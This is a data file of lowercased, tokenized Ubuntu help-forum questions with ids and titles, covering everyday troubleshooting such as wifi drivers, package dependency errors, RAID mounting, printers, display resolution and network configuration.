314803	command not found when running 'svn '	i installed the ubuntu 12.04 from a usb drive . i am having issue with my wifi connection . i tried to update the network adapter but ran into this problem with the svn command . sudo svn checkout http : //svn.madwifi-project.org/madwifi/trunk/ madwifi-ng i was using the codes from madwifi installation for atheros card in karmic koala however , i am stuck on step 7 . it says the sudo svn command can not be found when i entered in the step 7 code . i tried to find similar issue in the thread but could not find it.the thread i was reading from is closed . i have a atheros wireless network adapter and was trying to update it so i can use my wifi . right now i am using a ethernet . building dependency tree reading state information ... done e : the package google-chrome-stable needs to be reinstalled , but i ca n't find an archive for it . adamsfj @ adamsfj-aspire-4330 : ~ $ sudo apt-get install build-essential libssl-dev reading package lists ... done building dependency tree reading state information ... done e : the package google-chrome-stable needs to be reinstalled , but i ca n't find an archive for it . adamsfj @ adamsfj-aspire-4330 : ~ $ sudo apt-get install linux-headers- 'uname -r' reading package lists ... done building dependency tree reading state information ... done e : the package google-chrome-stable needs to be reinstalled , but i ca n't find an archive for it . adamsfj @ adamsfj-aspire-4330 : ~ $ sudo apt-get install subversion reading package lists ... done building dependency tree reading state information ... done e : the package google-chrome-stable needs to be reinstalled , but i ca n't find an archive for it . adamsfj @ adamsfj-aspire-4330 : ~ $ sudo -i root @ adamsfj-aspire-4330 : ~ # sudo svn checkout http : //svn.madwifi-project.org/madwifi/trunk/madwifi-ng sudo : svn : command not found root @ adamsfj-aspire-4330 : ~ # sudo svn checkout http : //svn.madwifi-project.org/madwifi/trunk/ madwifi -ng sudo : svn : command not found root @ adamsfj-aspire-4330 : ~ #
314806	what to do about a badblock problem ?	i tried to copy a large file from one partition to another and got a read error , so i ran badblocks . it reported somewhere around 250 bad blocks , if i remember correctly . my first reaction was `` oh , guess i need a new hard drive '' , but it 's not my boot partition , and the system is running just fine . it is , however , the same physical device as my boot drive . there 's nothing life shattering if i lose it , but it 'd be an annoyance . i figure this is either a pretty ominous sign that the drive will utterly fail soon , or that i just need to run something to move the data and mark those blocks out ? what command or app would best help me further diagnose / fix the problem ?
314809	why are mysterious jpg files being created in my home folder ?	why are mysterious jpg files being created in my home folder ? they seem to be thumbnails with file names containing word moth . me @ desktop : ~ $ cd $ home me @ desktop : ~ $ ls 01diplo1-moth.jpg documents 30car-moth.jpg dog-slater-obit-moth.jpg 30cover-moth.jpg douthat_new-moth.jpg 30drinkingsub-moth.jpg downloads 30-drugtrials-jp1-moth.jpg 30eat-moth-v2.jpg ecuador-moth.jpg 30fastfoodsub-moth.jpg execute-1-moth.jpg 30france-moth.jpg friedman_new-thumbstandard.jpg 30germany-moth.jpg jp-clinton-moth-v2.jpg 30-gret1-moth.jpg jp-qatar-moth.jpg 30jphirsch1-moth.jpg justice-moth-v4.jpg 30mob1_span-moth-v2.jpg mag-30pot-t_ca0-moth.jpg 30nature1-moth.jpg memory-moth-v2.jpg 30-next-span-moth.jpg my gcompris 30stone-img-moth.jpg pictures 30subcover_span-moth-v2.jpg public 30tour_2-moth.jpg rivera1-moth-v2.jpg audiobooks samesex-floater-2-moth.jpg audiobooks-moth.jpg statue-moth.jpg base-1-moth-v2.jpg sub-delos-cover-moth.jpg bike-moth-v2.jpg sunscreen-look-slide-t9sw-moth.jpg chinagold1-moth-v2.jpg templates desktop tennis-1-moth-v2.jpg
314810	how do i troubleshoot system slowness seen when viewing pdfs or videos ?	whenever i watch videos , either online of local via totem and/or open pdf files using evince . the system gets really , really bogged down . all apps get really slow , menus take forever to display , switching windows gives me time to make a coffee , etc . i 've purged adobe flash from the system , but youtube html5 videos still have the issue . a bunch of pdfs saved locally trigger the problem . and to ( temporarily ) remove the slowness , i need to shutdown the computer , breath for a few minutes , then restart . a simple reboot does not do the trick . how can i identify the cause ? this only started on 13.04 . i 've had ubuntu on this machine for a year without a problem until `` upgrading '' to 13.04 . i am not a programmer , but i suspect an issue with the intel video driver . is there something i can run which will diagnose this , or are there concrete steps i can follow to find the culprit ? i have run some hw tests ( memtest86+ , cpuburn , smarttools ) , they do not give any errors .
314815	ca n't print to konica minolta c353 in ubuntu 13.04	uri lpd : //192.168.1.94/print driver cups 1.2 from konica minolta website . new install , never had any operating system on this new built from scratch pc . it is set up to scan to folder with samba and that works fine.what am i missing . i am a newbie , never had any kind of linux .
314817	how do i install a kernel module in an lxc guest machine ?	i am attempting to install openstack devstack on an lxc guest machine . one of devstack 's packages requires a new kernel module , but when i try to run modprobe on the lxc guest i get an error : ubuntu @ lxc $ sudo modprobe scsi_transport_iscsi fatal : could not load /lib/modules/3.2.0-48-generic/modules.dep : no such file or directory how can i install this module for my lxc guest machine ?
314819	ubuntu 12.04 is very slow in my lenovo	i had been using ubuntu 10 in my lenovo 3000 n100 . when i upgraded to 12.04 it is very slow . how can i fix it . my friend told me my lap does not have sufficient configuration to support ubuntu 12.04 . can i switch back to earlier versions . please suggest me the best for my lenovo 3000 n100
314823	mdadm raid array fails to mount on startup , ok on dynamic access	first off , thanks for taking a look - i 've tried to tackle this problem more than once to no avail . the long and the short of the back-story ( though i ca n't recall specifics because it 's literally been years since this fiasco started ) is that an in-place upgrade wrecked my os install and i had to shift to a different version , but my raid array has never auto-mounted on start since then . the symptoms are as such : - on startup , numerous startup scripts are failing because the raid array is not being mounted - upon logging in , i can use a file browser to navigate to /media/media , which is displayed in my `` places '' dropdown in gnome , and therefore cause the os to mount the raid without intervention . ( given the excessive amounts of text & config files , i 've placed them in github gists instead of inline . ) here are the contents of my /etc/fstab file : https : //gist.github.com/jenrmagas/424aa919f948c4c85240/raw/b5ba15b8325cde633c28619be20f26dfc2d4bf63/etc+fstab now mind you , i 've had some substantial previous attempts at fixing this , so you 'll see some things commented out from prior installs and upgrades as well as troubleshooting attempts . when i do a 'dmesg | less ' , here is what i find from the most recent startup : https : //gist.github.com/jenrmagas/424aa919f948c4c85240/raw/c11f7328c6f9dfdded12b9bc7bf7dda847385174/dmesg+contents can anyone give some suggestions as to how i can get this working on startup ? let me know if there are additional details , config files , logs , etc. , and i will be more than happy to provide them . thank you again ! ~ jen
314828	the following packages have unmet dependencies:	can someone help me get rid of this bloody error ? the following packages have unmet dependencies : libc6 : depends : libc-bin ( = 2.15-0ubuntu10.3 ) mod-pagespeed-stable : i386 : depends : apache2.2-common : i386 but it is not installed depends : libc6 : i386 ( > = 2.4 ) but it is not installed depends : libgcc1 : i386 ( > = 1:4.1.1-21 ) but it is not installed depends : libstdc++6 : i386 ( > = 4.2.1-4 ) but it is not installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies
314830	how to make ip address static ( eth0 )	i 'm having a really hard time configuring ubuntu 13.04 to have a static ip address . i have tried multiple solutions but everytime i reboot ( ca n't do the network reset command because ubuntu freezes ) i end up with no connection . here is what i get when i type ifconfig into the terminal : eth0 link encap : ethernet hwaddr 10 : bf:48 : bc:07 : cb inet addr:192.168.0.8 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :12bf:48ff : febc:7cb/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1763067 errors:0 dropped:0 overruns:0 frame:0 tx packets:1024326 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2284491220 ( 2.2 gb ) tx bytes:136809317 ( 136.8 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1840 errors:0 dropped:0 overruns:0 frame:0 tx packets:1840 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:185688 ( 185.6 kb ) tx bytes:185688 ( 185.6 kb ) i have also tried this : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.0.160 netmask 255.255.255.0 broadcast 192.168.0.255 gateway 192.168.0.1 dns-nameservers 24.222.0.94 dns-nameservers 24.222.0.95 if anyone could help me it would be very much appreciated .
314831	timex device agent 3.0 does not detect timex run trainer ( usb )	i installed device agent and it is running with wine . it lets me login to my account on trainingpeaks ( on the web ) but i can not upload anything since my timer run trainer gps is not detected by timex device agent . totally new to ubuntu and wine , i really have no idea what to try . any help or suggestions would be great .
314833	diagnosing the problem when canon printer fails to print under ubuntu	i understand that the issue of canon printer under linux has a number of posts . actually one of these , was started by me . after inputs from others i have successfully printed using canon lbp6000 from my ubuntu machine for around a year . if it failed to print , restarting the daemon using this homemade script coaxed the printer to print . # ! /bin/bash pkill -9 -x ccpd pkill -9 -x captmoncnabc /etc/init.d/ccpd start /etc/init.d/ccpd status recently , i am not successful any more , or successful on a limited and sporadic basis . sometimes it prints when turned on after logging in , sometimes when the driver is reinstalled . i keep on trying the random steps ( call abracadabras ) until i get success . again , not always success comes . i frustrate on for hours only to get single page printed . i loose precious time on the issue of printing . i have read and read all the documents available over the internet . however , if you please notice , none of the guides , articles , tutorials ( these are too many to list here ) seem to be dealing with diagnosing the problem when it fails to print . they tell you where to find the drivers , how to install them , or which script to run to make the installation process automatic . yes , some of the articles or comments suggest a step to try , without any systematic order . but these fail to suggest a step based on symptoms , mostly . this morning , my canon lbp6000 failed to print . after sometime , there was a message for system error , details of which was found to be something like this . when i search for this error ( c3pldrv crashed with sigsegv in write ( ) ) , i find a number of articles including this one . none of these are actually helpful . mostly , these are 'me too ' , 'tell me if you find anything ' . running captstatusui -p lbp6000 produced this , yes , the printer is connected and actually turned on . i believe that there are a number of frustrated canon printer users out there like me . but there is not a step by step definitive guide to systematically diagnose a non-printing printer . do you think that you can provide your diagnosing inputs so that a systematic document can be built ? may be we will want the ubuntu users to stay away from canon printers . but as i believe , as a linux user for more than fifteen years , such a scenario is not acceptable any more . may be this was acceptable in the infancy days of linux , but not today . i am using ubuntu 12.04 , by the way , i prefer lts versions .
314834	custom .desktop file -- name does n't show up in unity dash on ubuntu 13.04	i have several .desktop files that i migrated over from 12.10 ubuntu . the applications they point to launch just fine , and the image displays in the dash when i search for them ... but there is n't any text below the images when they show up in the dash , it 's just the image . all other applications that were either installed by default , or installed through the software center show up just fine . here 's a sample .desktop that i created : [ desktop entry ] version=1.0 name=sublime text 2 genericname=text editor comment=awesome text editor exec=/home/wes/sublime\ text\ 2/sublime_text icon=/home/wes/sublime text 2/icon/128x128/sublime_text.png terminal=false type=application here 's what i mean : edit : this is just one example of 2 or 3 .desktop files that i have created in the past , that worked as expected in 12.10 , but all seem to be missing the application name in 13.04 ( in the dash only ) . i do n't think it is the icon size , as i have tried various different sizes ( 32x32 , 64x64 , 128x128 , etc ... ) .
314836	manage data/content : please explain `` sync all computers ''	scenario is thunderbird attachments : i wish to delete my content as stored on ubuntu server as friend has downloaded / received file their end . please could you explain what is meant by `` this change will sync with all computers '' . will it affect content in our email application only ? i hope it will not interfere with original location of file on my computer , neither new location where friend has stored it ? upon selecting to delete content , this message shows : `` are you sure you want to delete file x.pdf ? ( warning : this change will sync with all computers . ) '' thanks in advance . torunn ps1 : my interest is as end user only , not developer . ps2 : is there a ubuntu one manual around ? ; )
314838	does ubuntu 13.04 work on hp pavilion g7-2243us ?	i have an hp pavilion g7-2243us 17.3 '' notebook running windows 8 . i was wondering if ubuntu 13.04 installs and runs perfectly or if it wo n't work ? please help me , because i need to do this fast . thanks
314845	extremely slow desktop and laggy . need help with graphics driver	i am a fresh newbie ubuntu user and i just installed my first ubuntu 13.04 onto my hp slate 2 . i did a livecd on my usb drive and installed everything perfectly fine ... nice and smooth , not a trace of lag . then i rebooted using ubuntu itself on the computer , it was extremely slow and laggy . icons or any buttons does n't trigger right away , the performance of the entire thing looks like either 0.25 fps to 1 fps . my hp slate 2 information : processor : intel atom z670 1.5ghz memory ram : 2.0 gb videocard : intel gma 600 ( powervr sgx535 ) solidstatedrive ( ssd ) : 32gb i tried installing the intel linux graphics driver and it failed to install because it said i do n't have any intel based graphics card . well ... i do as you see above . what can i do ? i ca n't get on the internet on it , i 'm using my primary computer ( windows 7 ) to do all the searchings and put the files onto the usb to move it over to my tablet . simply ... i do n't get it ... using livecd on usb , it was all nice and smooth ... then after the installation ... boom ! slow , laggy , and etc . can anyone help me ? thanks !
314846	12.04 wo n't boot after trying to install 313 nvidia driver	i am trying to find a better driver for my graphics card and i tried using the 313 driver for nvidia in the x.org stable ppa . after the process , i can not boot into my ubuntu 12.04 partiton . i can boot with a live cd and access the partition and everything is there . how do i go back to the default drivers ?
314853	ca n't install ubuntu in windows 8	i’ve been trying to install ubuntu 13.04 64-bit edition on an asus ( k53z ) laptop . i have windows 8 64-bit installed in a non uefi mode ( i think since it starts-up with the windows logo and i don’t have the uefi settings ) . this laptop had installed windows 7 and when i upgraded it i didn’t knew about the uefi advantages . i tried several times to install ubuntu from a usb device and it loads the logo and then i can’t go further in the installation . i thought it was the version of ubuntu and tried to install fedora ( even if i personally prefer ubuntu ) . i had the same problem : fedora’s logo appears and it gets stuck . i tried also to boot from different usb devices and didn’t work either . my bios has efi options to boot but they were not enabled . so i tried to enable them to boot the usb in uefi mode . a menu shows up with the options of install ubuntu and try ubuntu . if i click the install or try option , i get a black screen and i can’t go further with the install ( which i think is normal since i don’t have windows 8 in efi mode ) . my hypothesis is that the bios isn’t letting ubuntu write or read from my ssd , because the activity led in the usb memory is on when it’s loading the installation files . once the files are ready and the ubuntu logo is loaded i don’t see a led activity on neither the ssd or the usb . thanks if i missed data you can ask me .
314855	how can i set up fakeraid/softraid using mdadm without losing data ?	there is raid0 of 2 drives connected through silicon image 3132 sata softraid controller . under windows it was partitioned as one dynamic gpt-disk having 4 tb ntfs volume . there is a lot of music and movies on the drive . i 'm trying to get him to be seen under ubuntu as a single disk , not as 2 by 2 terabytes . i tried to read it through dmraid , had no success , it is not displayed in /dev/mapper . also tried to configure the kernel , but did not find anything suspicious , the driver for my controller was turned on . there is also a driver from the manufacturer , but it is only available for rhel and sles . here it 's reported that softraid is supported by the kernel , but apparently not completely . if i thrust drives in the amd controller , built into the motherboard , the drive is seen as a single , but the data is lost . i know about mdadm that it is able to ditch all the information on the disks . so , is it possible to somehow create an array without actually recording information on used drives and to make the system correctly identify sections on it later ? information about the array : /dev/sdf - disk 0 /dev/sdg - disk 1 array type : stripe chunk size : 64kb also , a device /dev/md1 is created using command mknod /dev/md1 b 9 1
314859	wrong resolution for lightdm/gdm on ubuntu 13.04 using hdmi	i 've tried all the solution i could find on the matter so far , but the error persists . my problem is that the login screen ( both under gdm and lightdm ) runs with the wrong resolution , even though all is fine when i log in . the error occurs solely when i have my hdmi cable connected to my other screen . the login screen resolution becomes 1024x768 ( for my 1366x768 laptop screen ) and mirrored on my screen , which is 1920x1080 . i 've had this issue on version 12.04 ( the last one before i upgraded to 13.04 ) , but i got it fixed by adding the xrandr commands on the begining of the /etc/gdm/init/default file . this does n't seem to work anymore . i 've also tried telling lightdm to run a script fixing the resolution with xrandr ( by editing /etc/lightdm/lightdm.conf ) , but lightdm crashes , and i 'm forced to log in with low graphic settigs . hint : when ubuntu is loading , the resolution starts ok , then goes bad right before the login screen is initialized . does that mean that there 's nothing wrong with my graphic cards ? what do you think ? cheers !
314863	how do you run an installer ?	we bought a crashplan-install program for backing up the computer . since i am still learning about ubuntu , i do n't know how to run the installer . these are the only instructions that i have- to install crashplan run the installer in this directory : ./install.sh does this mean i need to create the directory ? i know how to do that , but if that is the case where ( or how ) do you run the installer ?
314864	alternatives to aptoncd to move software from ubuntu 13.04 to lubuntu 13.04	i am planning on shifting from ubuntu 13.04 to lubuntu ( 13.04 ) . i have a lot of softwares installed on ubuntu and since i do n't have a very good internet connection , i would like a way to install those softwares directly into my lubuntu system . is aptoncd the best/easiest way to do this ? what are the alternatives ?
314866	how can i upgrade from version 11.04 to a newer one ?	i am a new user and i am not a computer expert . i tried to follow the steps on one of the the ubuntu support pages , but it was not helpful ( page did not work ) . could some one help me , please ? thanks , ceci .
314870	would security be comprimised if i install a gui ( e.g . zpanel ) for lamp ?	i am an ubuntu/linux noob . there are many questions i have regarding the use of my system as a server . first and foremost is security . i want to install a simple gui ( zpanel appears the most user friendly ) that will allow others to log into the server and database with ease , similar to a hosting service , though my intent is for the development of one site . upon looking at the instructions of numerous gui 's , they require installation as root . this makes me uneasy , as my thoughts spiral to the possibilities of the developers creating the elusive 'back-door ' , thereby giving them root access to my entire system . am i just being paranoid or is that theoretically possible ? if it is possible , what steps are necessary to ensure security ?
314873	ubuntu 12.04lts stuck at login mouse and keyboard not responding	i have ubuntu 12.04lts installed on a dual-booted machine ( i5 dual core 8g ram ) and it 's been working fine , but today for some reason when i logged out and tried to log back in it is stuck at the login page , i.e . the mouse and the keyboard are not responding . the mouse is stuck at the top left corner of my screen , and i can do nothing but to turn the machine off . ( i have been using logitech wireless mouse and keyboard . ) i can not access the virtual console ( alt-f1 or cntrl-alt-f1 ) either ! here is what i have tried so far : verified it is not a h/w problem since the mouse and keyboard work fine with windows7 booted with ubuntu installation dvd and ran trial mode and mouse and keyboard worked fine . tried bypassing the login screen by booting into recovery mode and editing tty1.conf , but to no avail . i moved .xauthority .profile and .bashrc from my $ home to another location so my login would proceed completely by system defaults . but this did not help from recovery mode commandline used to dpkg-reconfigure to switch between gdm and lightgdm . this did not help either . by the way , when in recovery mode as root from command line i mount the filesystem , all apps work fine . python is ok , octave is ok , vi is ok etc . i have a feeling if i could only bypass the login screen , and automatically get into the desktop , i will be ok . but i have n't been able to accomplish this either . i desperately need help please . thank you in advance . update : so i tried to switch to lightdm by dpkg-configure lightdm . this at least brings me up to the classical linux commandline login prompt but without a gui . should i install startx ? should i install ubuntu-desktop ?
314874	tk/tcl error on ubuntu 12.04	i have installed tk/tcl on ubuntu 12.04 sudo apt-get install tk tcl when i executed wish i had a problem that all my window applications : terminal , file manager , firefox , ... ca n't drag & icons : close , maximum , minimum on every window applications had gone ! everything came back to normal when i closed wish 's window !
314876	installation problem involving netbook w/ 2 very small hard drives , partitioning is being a problem , too	i am trying to install ubuntu 12 on a first generation eee pc that has two itty bitty solid state drives . ( one drive is 8gb and one is 4.5gb . and that 's all i have to work with , too ! ) i already successfully installed on the 4.5gb drive , but after one use , there was n't even enough disk space to save a file . also , the 8gb drive does n't seem to be able to hold files at all , and is n't visible from the main ubuntu interface , anyways . what i need to do is simply blank out the installation on the 4.5gb drive , and put a new installation on the 8gb drive . i do n't honestly care about having a whole lot of extra disk space on this computer , since it 's a netbook and a work computer . if i can get the installation to go , and the 4gb drive emptied out , i 'll be happy to use that 4gb drive for the files that come from a days ' work , to be emptied out each night . i can follow instructions , but i am sadly lacking on the understanding on how i would go about partitioning my drives , or telling ubuntu to install on the 8gb drive , or even the terminology i would need to search online for instructions on how to do this . apparently , my problem has something to do with partitioning the drives ? help ! all i get is errors when i try to use the tool provided in setup , and i know it 's likely my fault for not understanding something essential . what i need are detailed , step-by-step instructions to get the os on the drive i want it on , not on the smaller drive that is apparently automatically selected when i go to install ubuntu ... what do i do ?
314878	how to change swap partition to add more	i play a lot of minecraft/tekkit . i have quite a bit of lag issues and my brother told me to add more vm ram . he said it 's called swap partitioning on linux . i am looking for a simple solution , i ca n't access my su ( it 's not accepting my password ) . i am running ubuntu 13.04 . i have 2gb ram and 250 hard drive space . please help . my laptop is a presario compact from the stone age , does that change anything ?
314881	how to control the 3.5mm jack data ?	in my smartphone , while listening to music , when i press the call button in the earphone ( the one provided with the phone ) , the music passes and when i press it again the music starts playing . i would like to replicate this functionality in desktop music apps . so , in my scenario , i have an earphone ( with the call button ) , attached to the 3.5mm jack . how can i come know when the call button is pressed in the earphone . is there someway i can analayse on of the /dev files for this ? is this functionality even supported in the linux kernel ?
314882	how to hide a window when another window is maximized	i use terminator and have configured it to behave like guake by following the below article . http : //www.webupd8.org/2011/07/install-terminator-with-built-in-quake.html one of the points mentioned , was to choose the option hide on lose focus . the problem with this is , whenever a popup like a system error message or disk memory low arises or even when the app indicators are accessed , terminator window gets hidden . what i want , is for the terminator window to get hidden only when another window completely covers the screen . so , only when a maximized window is brought into focus , the terminator window should be hidden . in all other cases , it should not be hidden . how do i achieve this in ubuntu ?
314884	how to add my windows 8 partition into ubuntu 12.04 partition	i have installed a side by side ubuntu 12.04 along with my windows 8 , now i want to delete windows 8 completely and i want to add size to my ubuntu partition fully . what should i do now to increase my ubuntu partition by adding windows 8 drive space . please help me ... i want the ubuntu partition to be increased as i have given only 43 gb while installing . i want to add windows 8 partition to my ubuntu partition . thanking you .
314886	how to reliably block package version from update ?	i built and installed my own version of package tora with oracle instantclient support using this guide . it has the same version as the package available from standart ubuntu repository so synaptic tells me it needs to be updated . i blocked it there , however , apt-get does not know about it and installs the default useless version everytime i do apt-get upgrade . how can i disable such behavior ? i guess i should correct the build number of my package but i do n't know where to hack sources . my tora version is 2.1.3-2build1 .
314887	how to highlight the last active window in the gnome shell preview	is there a way to highlight ( with some sort of indicator ) the last active window in the gnome launcher ? suppose this is my launcher , and i have just used the terminal . i 'm wondering if there is a way to highlight it as the last active one , to differentiate it from the rest of the windows : so the result would be something like this : i 'm completely new to ubuntu and ask ubuntu , so please let me know if this question needs to be edited .
314892	ethernet over gre	i 'm looking at configuring ethernet over gre on ubuntu and have not come across any resources on it yet . this talks about configuring ip over gre , i believe . http : //onvox.net/linux/how-to-create-ipv4-gre-tunnels-in-ubuntu any pointers ? thanks !
314894	which is the best ubuntu version for android development ?	i have to decide the best suitable version of ubuntu for android development.as per the research what i have done , 10.04 has been a stable version of ubuntu ; but since the support has been ended from may 9 , '13 onwards i would like to know which is the best version of ubuntu that i can opt for . kindly advice . regards sudha kumari
314895	dell laptop display brightness problem	i am using dell inspiron 15 and ubuntu 13.04 . i have hot keys on my keyboard to adjust display brightness and they work fine.but the problem is , as soon as i switch on the laptop the brightness is set to 100 % . i have to reduce the brightness manually . also the brightness decreases when the battery is low , when i charge my laptop . i am looking for the following : run the command `` xbacklight -set 10 '' on booting the machine , to set the screen display brightness to 10 % . how to execute this at startup ? how to get complete control over brightness settings ? like how much brightness should be there at startup , how much brightness should be there when battery is low and how much brightness should be there during charging . is there any software/utility to sense lighting in room by using web-cam of laptop and adjust the brightness automatically . if no such thing is available , i would like to develop one . please guide me how to start . thanks in advance : )
314896	can i find the kernel version in system logs	i am developing a new debugging technique bc my ubuntu crashes . i had this idea of running with older kernels and see if they behave better/worse . i know how to find kernel version using a command . what i like to know if there is a message written in system logs showin g the kernel version . and if there is no version written in the logs , i would strongly suggest that it is put in . namely after boot , the first line would say this is kernel 3.2.0-48-generic # 74-ubuntu smp , or whatever . thank you for listening
314908	firefox can not start up	i am facing this error when i start firefox your firefox profile can not be loaded . it may be missing or inaccessible . i just installed ubuntu so i do not know what 's wrong with it . i am using chrome now . i must use sudo firefox to start firefox which is very troublesome .
314911	terminal default profile preferences	i edited the profile preferences for my terminal like its background image , text color etc . now i dont know how to revert back the changes to the basic default terminal preferences which comes in ubuntu . please help .
314912	how to control the up order of network interfaces ?	i have /etc/network/interfaces as follow . every time the system boots up , the route is wrong so the gateway is not reachable . i 'd have to ifdown br0 & & ifup br0 to fix the route table and make everything work . how to fix this forever ? auto lo iface lo inet loopback auto eth0 iface eth0 inet manual bond-master bond0 auto eth1 iface eth1 inet manual bond-master bond0 auto bond0 iface bond0 inet dhcp bond-mode balance-tlb bond-slaves none auto br0 iface br0 inet dhcp bridge_ports bond0 edit this is the route table from ip r s after i reboot the host . there is an extra routing path . before restart br0 : default via 10.69.208.129 dev bond0 metric 100 10.69.208.128/26 dev bond0 proto kernel scope link src 10.69.208.172 10.69.208.128/26 dev br0 proto kernel scope link src 10.69.208.172 169.254.0.0/16 dev br0 scope link metric 1000 192.168.1.0/24 dev lxcbr0 proto kernel scope link src 192.168.1.1 after restart br0 : default via 10.69.208.129 dev br0 metric 100 10.69.208.128/26 dev br0 proto kernel scope link src 10.69.208.172 169.254.0.0/16 dev br0 scope link metric 1000 192.168.1.0/24 dev lxcbr0 proto kernel scope link src 192.168.1.1
314916	kontact launches kmail	kubuntu 13.04 . launching kontact opens a separate window for kmail , which is annoying . if i launch kontact i just want kontact to be opened . if i need just kmail i 'll just launch kmail . any idea ? thanks .
314921	installing novell designer	i try to install novell designer 4.0.1 on ubuntu . but i get the error message : preparing to install ... extracting the jre from the installer archive ... unpacking the jre ... extracting the installation resources from the installer archive ... configuring the installer for this system 's environment ... launching installer ... ./install : 2468 : exec : /tmp/install.dir.4347/linux/resource/jre/bin/java : not found what could i do to get the installation working ?
314925	ubuntu 13.04 offline install with wubi	i downloaded wubi and `` ubuntu-13.04-desktop-i386.iso '' and kep in same folder.when i initiated install wubi starts to download 12.x . version of ubuntu and never considered downloaded ubuntu-13.04-desktop-i386.iso.help me how can i install u13.04 using wubi [ offline ] .
314928	force unity dash to index all files on home	not all files on my home directory can be found via dash , can i force dash to index all files so i can search for any files in any depth via dash ?
314932	how to make opera to ignore system palette in lubuntu	i have black background in lubuntu and in some guis opera show me black font on black background . for example , in notes - i can see name of the note only when i select it : any solutions ?
314933	how do i keep my huawei e3131 3g modem from unmounting ?	i need help getting my huawei e3131 modem to ( consistently ) work . i am currently running ubuntu 12.04.2 and 3g dongles have worked many times before . however , my newly acquired huawei e3131 is causing problems . when plugged in , ubuntu detects the device as a cd-rom and a modem . i can browse the dongle 's contents using nautilus and network manager is able to configure and work the dongle out-of-the-box . i can even get to surf . however , within minutes , the connection drops and the cd-rom is unmounted . i wait about 15 seconds , then the cd-rom mounts again and network manager is able to connect again with short-lived surfing . rinse , lather and repeat . it 's strange that the device mounts as a cd-rom , but works as a modem , too , suggesting that mode switching happens somewhere . it 's not a signal coverage problem , either because i tested the same sim card using 3 other different dongles ( 2 ztes and another huawei ) and it is only this e3131 that has this problem . if pertinent , the other dongles were n't being detected as cd-roms . output of lsusb bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0ac8 : c342 z-star microelectronics corp . bus 001 device 010 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard bus 001 device 004 : id 0a5c:219b broadcom corp. bluetooth 2.1 device i tried installing the drivers found here , but no fish . furthermore , my device is an e3131 , but lsusb for some reason detects it as an e398 . i 'm not sure how that plays a role for this problem , though . i hope someone out there can help me . i 'm out of ideas already . thank you very much !
314934	apt-get broken + dependencies issue + many software uninstalled	os=ubuntu 12.04 64bit 3.2.0-29-generic what i did ? apt-get purge libre* which i thought will remove lo 3.5 but , which was a big mistake after couple of moments , i realise that its is removing all other software so i did cltl-c which stopped the apt process i restarted my system after that i found that following software were missing apt-get , evince ( pdf ) , cheese etc..here is full list http : //pastebin.com/cwhrw10y i managed to install apt deb file through dpkg but now i am not able to do any installation so i just removed /var/lib/dpkg/status and created new but that didnt help apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : apt-utils coreutils debconf debconf-i18n dpkg libacl1 libapt-inst1.4 libapt-pkg4.12 libattr1 libbz2-1.0 libdb5.1 libgcc1 liblocale-gettext-perl liblzma5 libselinux1 libstdc++6 libtext-charwidth-perl libtext-iconv-perl libtext-wrapi18n-perl perl-base tar tzdata xz-utils zlib1g suggested packages : debconf-doc debconf-utils whiptail dialog gnome-utils libterm-readline-gnu-perl libgtk2-perl libnet-ldap-perl libqtgui4-perl libqtcore4-perl apt bzip2 ncompress xz-lzma the following new packages will be installed : apt-utils coreutils debconf debconf-i18n dpkg libacl1 libapt-inst1.4 libapt-pkg4.12 libattr1 libbz2-1.0 libdb5.1 libgcc1 liblocale-gettext-perl liblzma5 libselinux1 libstdc++6 libtext-charwidth-perl libtext-iconv-perl libtext-wrapi18n-perl perl-base tar tzdata xz-utils zlib1g 0 upgraded , 24 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/9,246 kb of archives . after this operation , 29.9 mb of additional disk space will be used . do you want to continue [ y/n ] ? y e : can not get debconf version . is debconf installed ? debconf : apt-extracttemplates failed : no such file or directory dpkg : regarding ... /libgcc1_1 % 3a4.6.3-1ubuntu5_amd64.deb containing libgcc1 , pre-dependency problem : libgcc1 pre-depends on multiarch-support multiarch-support is unpacked , but has never been configured . dpkg : error processing /var/cache/apt/archives/libgcc1_1 % 3a4.6.3-1ubuntu5_amd64.deb ( -- unpack ) : pre-dependency problem - not installing libgcc1 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/libgcc1_1 % 3a4.6.3-1ubuntu5_amd64.deb e : internal error , no file name for libc6 w : could not perform immediate configuration on 'multiarch-support : amd64 ' . please see man 5 apt.conf under apt : :immediate-configure for details . ( 2 ) e : sub-process /usr/bin/dpkg returned an error code ( 1 ) # apt-get -u dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libc6 : depends : libgcc1 but it is not installed depends : tzdata but it is not installed e : unmet dependencies . try using -f. i have tried below link unable to install due to debconf problem how do i resolve unmet dependencies ? but no help ... thanks
314938	how can i run sudo gedit as gksu gedit	i 'm looking into ways of automatically loading gedit as gksu gedit when i enter sudo gedit by mistake ? i have found that i have made a number of files unreachable by using gedit and i have only just found out why ! achieved so far i have written a script which will make an alias so that if i type in sudo < application > it can automatically convert that to gksu < application > but i want to make this alias stick , so that i do n't have to run the script every time i boot the computer . is there a config file i can edit or should i run this script as a start up script ( which would be inconvenient ! ) ?
314939	how to install gwibber from *tar.gz file ?	i am very new to ubuntu and obviously i do n't know much about terminal commands.please tell me how can i install gwibber from *tar.gz file
314941	most user friendly ubuntu ide	what is the most user friendly ide for html , css and js on ubuntu ? i have heard it said that programming on the linux platform can be quite potent when creating server applications . can you good people post your photos or screenshots of workspaces where any ides are used heavily . thanks tons ...
